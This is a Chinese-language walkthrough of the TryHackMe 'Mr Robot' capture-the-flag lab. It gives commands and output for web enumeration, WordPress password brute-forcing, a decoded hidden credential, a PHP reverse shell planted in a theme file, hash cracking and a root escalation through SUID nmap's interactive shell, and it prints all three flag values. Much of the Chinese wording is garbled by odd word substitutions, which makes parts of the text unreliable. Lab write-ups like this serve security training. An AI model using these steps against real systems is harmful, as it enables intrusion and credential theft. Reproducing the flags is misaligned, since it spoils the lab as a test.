服务发现
┌──(root💀kali)-[~/tryhackme/mrrobot]
└─# nmap -sV -Pn 10.10.180.172 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-09-15 02:33 EDT
Nmap scan report for 10.10.180.172
Host is up (0.31s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 398.37 seconds
查看 http://10.10.180.172/robots.txt,显示两个文件
User-agent: *
fsocity.dic
key-1-of-3.txt
关上 http://10.10.180.172/key-1-of…,找到 key 1
073403c8a58a1f80d943455fb30724b9
fsocity.dic 下载下来,像是一个字典文件, 可能是登陆密码字典,那么当初须要的是一个可登陆的用户名?
目录爆破
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -u "http://10.10.180.172" -e* -t 100
_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_|)
Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100
Error Log: /root/dirsearch/logs/errors-21-09-15_03-27-35.log
Target: http://10.10.180.172
[03:27:36] Starting:
[03:29:13] 403 - 218B - /.user.ini
[03:29:46] 301 - 0B - /0 -> http://10.10.180.172/0/
[03:31:19] 301 - 233B - /admin -> http://10.10.180.172/admin/
[03:31:39] 200 - 1KB - /admin/
[03:31:39] 403 - 224B - /admin/.htaccess
[03:31:39] 200 - 1KB - /admin/?/login
[03:31:43] 301 - 0B - /adm/index.php -> http://10.10.180.172/adm/
[03:32:00] 200 - 1KB - /admin/index
[03:32:00] 200 - 1KB - /admin/index.html
[03:32:26] 301 - 0B - /admin/index.php -> http://10.10.180.172/admin/
[03:32:45] 301 - 0B - /admin2/index.php -> http://10.10.180.172/admin2/
[03:33:01] 301 - 0B - /admin_area/index.php -> http://10.10.180.172/admin_area/
[03:33:50] 301 - 0B - /adminarea/index.php -> http://10.10.180.172/adminarea/
[03:34:37] 301 - 0B - /administrator/index.php -> http://10.10.180.172/administrator/
[03:35:33] 301 - 0B - /apc/index.php -> http://10.10.180.172/apc/
[03:35:40] 301 - 233B - /audio -> http://10.10.180.172/audio/
[03:36:05] 301 - 0B - /atom -> http://10.10.180.172/feed/atom/
[03:36:35] 301 - 232B - /blog -> http://10.10.180.172/blog/
[03:36:38] 301 - 0B - /bb-admin/index.php -> http://10.10.180.172/bb-admin/
[03:36:52] 301 - 0B - /bitrix/admin/index.php -> http://10.10.180.172/bitrix/admin/
[03:37:46] 301 - 0B - /Citrix/AccessPlatform/auth/clientscripts/cookies.js -> http://10.10.180.172/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[03:38:36] 301 - 231B - /css -> http://10.10.180.172/css/
[03:40:26] 301 - 0B - /engine/classes/swfupload/swfupload.swf -> http://10.10.180.172/engine/classes/swfupload/swfupload.swf
[03:40:27] 301 - 0B - /engine/classes/swfupload/swfupload_f9.swf -> http://10.10.180.172/engine/classes/swfupload/swfupload_f9.swf
[03:40:42] 301 - 0B - /etc/lib/pChart2/examples/imageMap/index.php -> http://10.10.180.172/etc/lib/pChart2/examples/imageMap/
[03:40:52] 301 - 0B - /extjs/resources/charts.swf -> http://10.10.180.172/extjs/resources/charts.swf
[03:40:55] 200 - 0B - /favicon.ico
[03:41:04] 301 - 0B - /feed -> http://10.10.180.172/feed/
[03:42:04] 301 - 234B - /images -> http://10.10.180.172/images/
[03:42:10] 301 - 0B - /html/js/misc/swfupload/swfupload.swf -> http://10.10.180.172/html/js/misc/swfupload/swfupload.swf
[03:42:25] 200 - 1KB - /index.html
[03:42:29] 301 - 0B - /image -> http://10.10.180.172/image/
[03:42:51] 301 - 0B - /index.php -> http://10.10.180.172/
[03:42:51] 200 - 504KB - /intro
[03:42:52] 301 - 0B - /index.php/login/ -> http://10.10.180.172/login/
[03:43:05] 301 - 230B - /js -> http://10.10.180.172/js/
[03:43:31] 200 - 309B - /license.txt
[03:44:22] 302 - 0B - /login -> http://10.10.180.172/wp-login.php
[03:44:30] 302 - 0B - /login/ -> http://10.10.180.172/wp-login.php
[03:45:10] 301 - 0B - /modelsearch/index.php -> http://10.10.180.172/modelsearch/
[03:45:11] 301 - 0B - /myadmin/index.php -> http://10.10.180.172/myadmin/
[03:45:19] 301 - 0B - /panel-administracion/index.php -> http://10.10.180.172/panel-administracion/
[03:45:23] 403 - 94B - /phpmyadmin
[03:45:53] 403 - 94B - /phpmyadmin/
[03:45:54] 403 - 94B - /phpmyadmin/scripts/setup.php
[03:46:40] 301 - 0B - /pma/index.php -> http://10.10.180.172/pma/
[03:46:53] 200 - 64B - /readme
[03:46:53] 200 - 64B - /readme.html
[03:47:13] 200 - 41B - /robots.txt
[03:47:42] 301 - 0B - /rss -> http://10.10.180.172/feed/
[03:48:29] 200 - 0B - /sitemap
[03:48:29] 200 - 0B - /sitemap.xml
[03:48:30] 200 - 0B - /sitemap.xml.gz
[03:48:53] 301 - 0B - /siteadmin/index.php -> http://10.10.180.172/siteadmin/
[03:49:16] 301 - 0B - /sql/index.php -> http://10.10.180.172/sql/
[03:50:32] 301 - 0B - /templates/ja-helio-farsi/index.php -> http://10.10.180.172/templates/ja-helio-farsi/
[03:50:33] 301 - 0B - /templates/rhuk_milkyway/index.php -> http://10.10.180.172/templates/rhuk_milkyway/
[03:50:33] 301 - 0B - /templates/beez/index.php -> http://10.10.180.172/templates/beez/
[03:50:59] 301 - 0B - /tmp/index.php -> http://10.10.180.172/tmp/
[03:52:05] 301 - 236B - /wp-admin -> http://10.10.180.172/wp-admin/
[03:52:09] 301 - 238B - /wp-content -> http://10.10.180.172/wp-content/
[03:52:10] 403 - 245B - /wp-content/plugins/akismet/admin.php
[03:52:10] 403 - 247B - /wp-content/plugins/akismet/akismet.php
[03:52:11] 403 - 228B - /wp-content/uploads/
[03:52:11] 301 - 239B - /wp-includes -> http://10.10.180.172/wp-includes/
[03:52:11] 403 - 221B - /wp-includes/
[03:52:16] 301 - 0B - /webadmin/index.php -> http://10.10.180.172/webadmin/
[03:52:30] 302 - 0B - /wp-admin/ -> http://10.10.180.172/wp-login.php?redirect_to=http%3A%2F%2F10.10.180.172%2Fwp-admin%2F&reauth=1
[03:52:31] 500 - 3KB - /wp-admin/setup-config.php
[03:52:35] 200 - 0B - /wp-content/
[03:52:37] 200 - 0B - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[03:52:37] 500 - 0B - /wp-includes/rss-functions.php
[03:52:37] 200 - 3KB - /wp-login
[03:52:38] 200 - 3KB - /wp-login.php
[03:52:38] 200 - 3KB - /wp-login/
[03:52:38] 301 - 0B - /wp-register.php -> http://10.10.180.172/wp-login.php?action=register
[03:52:51] 405 - 42B - /xmlrpc.php
wpscan 开掘 wordpress 信息,没什么有用的信息,枚举 authid 也无奈爆破 wordpress 用户名
┌──(root💀kali)-[~/tryhackme/mrrobot]
└─# wpscan --url http://10.10.180.172
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.14
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.180.172/ [10.10.180.172]
[+] Started: Wed Sep 15 02:55:03 2021
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.180.172/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.180.172/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] The external WP-Cron seems to be enabled: http://10.10.180.172/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.180.172/d6f242c.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.180.172/d6f242c.html, Match: 'WordPress 4.3.1'
[+] WordPress theme in use: twentyfifteen
| Location: http://10.10.180.172/wp-content/themes/twentyfifteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.180.172/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://10.10.180.172/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.180.172/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:12:45 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:12:45
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Sep 15 03:17:20 2021
[+] Requests Done: 173
[+] Cached Requests: 6
[+] Data Sent: 42.372 KB
[+] Data Received: 267.073 KB
[+] Memory used: 209.672 MB
[+] Elapsed time: 00:22:17
首页命令行反对 6 个命令,钻研了半天,没看到有什么有用的信息
prepare ---> 显示动画:whoismyrobot.com
fsociety ---> 显示动画:are you ready to join fsociety
inform ---> 显示四张图片,表白了一些观点,没看进去有什么线索
question ---> 显示四张图片,别离批评了 patriot,executive,capitalist,businessman
wakeup ---> 显示一个动画,没有文字
join ---> 留下一个邮箱
在 http://10.10.180.172/license.txt,关上 f12,找到 base64 加密过的暗藏线索
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
do you want a password or something?
ZWxsaW90OkVSMjgtMDY1Mgo=
解密后:
elliot:ER28-0652
登陆进去当前,在 users 里收集到两个用户名和邮箱
elliot Elliot Alderson elliot@mrrobot.com
mich05654 krista Gordon kgordon@therapist.com
用下载的字典爆破 mich05654 账号
wpscan --url http://10.10.180.172/ --usernames mich05654 --passwords /root/tryhackme/mrrobot/fsocity.dic
[!] Valid Combinations Found:
| Username: mich05654, Password: Dylan_2791
然而登陆进去如同没什么有用的信息?
回到 elliot 登录界面
在后盾页面 Appearace->Theme Editer 能够编辑在应用皮肤外面的 php 代码,咱们抉择 404.php 这个文件,上传一个反弹 shell
应用这个 payload:https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
把代码复制到 404.php, 批改反弹主机信息
开启监听
在前台页面轻易输出一个不存在的页面,触发反弹 shell –>http://10.10.180.172/asdasdda…
在 /home/robot 目录找到 key-2-of-3.txt 文件,然而 webshell 没有读权限
在同目录找到一个哈希文件
$ ls -alh
ls -alh
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 2015 .
drwxr-xr-x 3 root root 4.0K Nov 13 2015 ..
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
把哈希文件保留到靶机的 hash.txt,用 jonn 爆破
┌──(root💀kali)-[~/tryhackme/mrrobot]
└─# john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
abcdefghijklmnopqrstuvwxyz (robot)
1g 0:00:00:00 DONE (2021-09-15 22:49) 50.00g/s 2025Kp/s 2025Kc/s 2025KC/s bonjour1..123092
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
明码:abcdefghijklmnopqrstuvwxyz,切换到 tty 当前 su robot,查看 key-2-of-3.txt
$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$
依据提醒,查看 nmap 权限,发现是一个 suid
robot@linux:~$ whereis nmap
whereis nmap
nmap: /usr/local/bin/nmap
robot@linux:~$ ls -al /usr/local/bin/nmap
ls -al /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
依据 GTFPbins 里 nmap 的提权办法,这里采纳 shell- b 办法晋升到 root 权限,拿到 key-3-of-3.txt
robot@linux:~$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 (http://www.insecure.org/nmap/)
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# ls -alh /root
ls -alh /root
total 32K
drwx------ 3 root root 4.0K Nov 13 2015 .
drwxr-xr-x 22 root root 4.0K Sep 16 2015 ..
-rw------- 1 root root 4.0K Nov 14 2015 .bash_history
-rw-r--r-- 1 root root 3.2K Sep 16 2015 .bashrc
drwx------ 2 root root 4.0K Nov 13 2015 .cache
-rw-r--r-- 1 root root 0 Nov 13 2015 firstboot_done
-r-------- 1 root root 33 Nov 13 2015 key-3-of-3.txt
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw------- 1 root root 1.0K Sep 16 2015 .rnd
# cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
#